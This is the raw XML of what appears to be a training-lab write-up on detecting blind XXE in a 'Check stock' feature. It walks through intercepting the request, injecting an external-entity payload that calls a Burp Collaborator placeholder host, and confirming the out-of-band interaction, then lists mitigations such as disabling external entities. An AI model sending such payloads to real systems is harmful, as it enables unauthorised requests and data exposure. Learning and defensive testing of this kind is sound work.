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91C" w14:textId="1FC5D7A4" w:rsidR="00320924" w:rsidRDefault="009F1CCE" w:rsidP="00B36D89">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>SCENARIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2844B8C2" w14:textId="3C845C97" w:rsidR="00B36D89" w:rsidRPr="00EC3CC6" w:rsidRDefault="002D4948" w:rsidP="005E4E23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The application is vulnerable to XXE out of band interaction as it </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4948">
        <w:t>has a "Check stock" feature that parses XML input but does not display the result</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CE0A2A">
        <w:t xml:space="preserve"> We will try to </w:t>
      </w:r>
      <w:r w:rsidR="00CE0A2A" w:rsidRPr="00CE0A2A">
        <w:t>detect the blind XXE vulnerability by triggering out-of-band interactions with an external domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5364B1E4" w14:textId="77777777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43CB22" w14:textId="427C8B32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1CB7B99E" w14:textId="7A6BDDEC" w:rsidR="00A0135C" w:rsidRDefault="00152623" w:rsidP="00455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 the web application and visit any product page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B241700" w14:textId="700C3741" w:rsidR="00CB17DB" w:rsidRDefault="00CB17DB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Send a Check Stock request and intercept the POST request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Proxy tab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5553ADDA" w14:textId="3222284E" w:rsidR="00E1363A" w:rsidRDefault="004F232A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Replace the XML body of the request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 with the Payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57781895" w14:textId="24A79C50" w:rsidR="00C36F78" w:rsidRPr="00E1363A" w:rsidRDefault="00C36F78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</w:t>
      </w:r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click Poll Now in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CC224F"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 Collaborator Client and we see that we successfully </w:t>
      </w:r>
      <w:r w:rsidR="00DC6F94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">forced the application to make </w:t>
      </w:r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an out of band </w:t>
      </w:r>
      <w:r w:rsidR="003D6F3C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>interaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18405899" w14:textId="77777777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C86D1A" w14:textId="5DAB2FEB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33821487" w14:textId="77777777" w:rsidR="004F232A" w:rsidRPr="004F232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>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205A44A7" w14:textId="6BEC692E" w:rsidR="004F232A" w:rsidRPr="004F232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 xml:space="preserve">&lt;!DOCTYPE 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stockCheck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 xml:space="preserve"> [ &lt;!ENTITY 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 xml:space="preserve"> SYSTEM "</w:t>
      </w:r>
      <w:r w:rsidR="00C36F78" w:rsidRPr="00C36F78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://BURP-COLLABORATOR-SUBDOMAIN</w:t>
      </w:r>
      <w:r w:rsidRPr="004F232A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gramStart"/>
      <w:r w:rsidRPr="004F232A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt; ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004F232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42088AB1" w14:textId="77777777" w:rsidR="004F232A" w:rsidRPr="004F232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stockCheck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5CBD81D7" w14:textId="77777777" w:rsidR="004F232A" w:rsidRPr="004F232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 xml:space="preserve">    &lt;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productId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>&gt;&amp;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>;&lt;/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productId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6D2AF144" w14:textId="77777777" w:rsidR="004F232A" w:rsidRPr="004F232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 xml:space="preserve">    &lt;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storeId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>&gt;1&lt;/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storeId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7012FEF3" w14:textId="2376A794" w:rsidR="00595F51" w:rsidRPr="00C6154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>&lt;/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stockCheck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58BCAABD" w14:textId="77777777" w:rsidR="00595F51" w:rsidRDefault="00595F51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CCF8D0" w14:textId="23C2F7E0" w:rsidR="00595F51" w:rsidRDefault="00595F51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42AD5084" w14:textId="77777777" w:rsidR="00DB6948" w:rsidRPr="00DB6948" w:rsidRDefault="00DB6948" w:rsidP="00DB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6948">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Disable External Entity Processing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB6948">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> One of the most effective countermeasures is to disable the processing of external entities in your XML parser. Depending on the library or framework, this can usually be done with a single setting or configuration change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF6B2B2" w14:textId="77777777" w:rsidR="00DB6948" w:rsidRPr="00DB6948" w:rsidRDefault="00DB6948" w:rsidP="00DB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694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Avoid Serializing Sensitive Data:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB6948">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> As a best practice, avoid serializing sensitive data or configuration data in XML format, especially if it will be parsed and processed by other systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3208DE" w14:textId="77777777" w:rsidR="00DB6948" w:rsidRPr="00DB6948" w:rsidRDefault="00DB6948" w:rsidP="00DB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6948">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Patch and Update:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB6948">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Always ensure that you are using the latest versions of libraries, especially XML processing libraries. Updates often contain security patches for known vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368AFAF3" w14:textId="77777777" w:rsidR="00DB6948" w:rsidRPr="00DB6948" w:rsidRDefault="00DB6948" w:rsidP="00DB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6948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 Validation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB6948">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Enforce strict input validation, especially for XML data coming from untrusted sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCA0F00" w14:textId="77777777" w:rsidR="00DB6948" w:rsidRPr="00DB6948" w:rsidRDefault="00DB6948" w:rsidP="00DB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6948">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Network Restrictions:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB6948">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> For server-side XML parsers, configure them to not have access to the internet. This can prevent most out-of-band XXE attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAE3ADB" w14:textId="77777777" w:rsidR="00DB6948" w:rsidRPr="00DB6948" w:rsidRDefault="00DB6948" w:rsidP="00DB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6948">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Disable Unused Features:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB6948">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Disable XML processing features that are not required, such as document type definitions (DTDs) or inline schemas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D14C4D1" w14:textId="77777777" w:rsidR="00DB6948" w:rsidRPr="00DB6948" w:rsidRDefault="00DB6948" w:rsidP="00DB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6948">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Error Handling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB6948">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Don't disclose stack traces or detailed error messages to users. These can provide attackers with valuable information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282C8CBB" w14:textId="011C42D1" w:rsidR="00595F51" w:rsidRPr="00DB6948" w:rsidRDefault="00DB6948" w:rsidP="00575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6948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Simpler Data Formats:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB6948">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> If possible, use simpler data formats like JSON which don't have the capability to define external entities.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00595F51" w:rsidRPr="00DB6948" w:rsidSect="0058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E4B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B87AB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0601D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="554A9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1290">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1603024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DD"/>
    <w:rsid w:val="00045251"/>
    <w:rsid w:val="00050FA0"/>
    <w:rsid w:val="00152623"/>
    <w:rsid w:val="00215125"/>
    <w:rsid w:val="002D4948"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="003D6F3C"/>
    <w:rsid w:val="00455916"/>
    <w:rsid w:val="004F232A"/>
    <w:rsid w:val="00586A86"/>
    <w:rsid w:val="00595F51"/>
    <w:rsid w:val="005E4E23"/>
    <w:rsid w:val="007649DD"/>
    <w:rsid w:val="009F1CCE"/>
    <w:rsid w:val="00A0135C"/>
    <w:rsid w:val="00B36D89"/>
    <w:rsid w:val="00C36F78"/>
    <w:rsid w:val="00C6154A"/>
    <w:rsid w:val="00CB17DB"/>
    <w:rsid w:val="00CC224F"/>
    <w:rsid w:val="00CE0A2A"/>
    <w:rsid w:val="00DB6948"/>
    <w:rsid w:val="00DC6F94"/>
    <w:rsid w:val="00E1363A"/>
    <w:rsid w:val="00EC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E43"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{61D4380F-4A9B-4EAE-B2F3-FCA29CB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D89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36D89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E4E2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E4E2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5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28</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-03T04:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-06T10:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>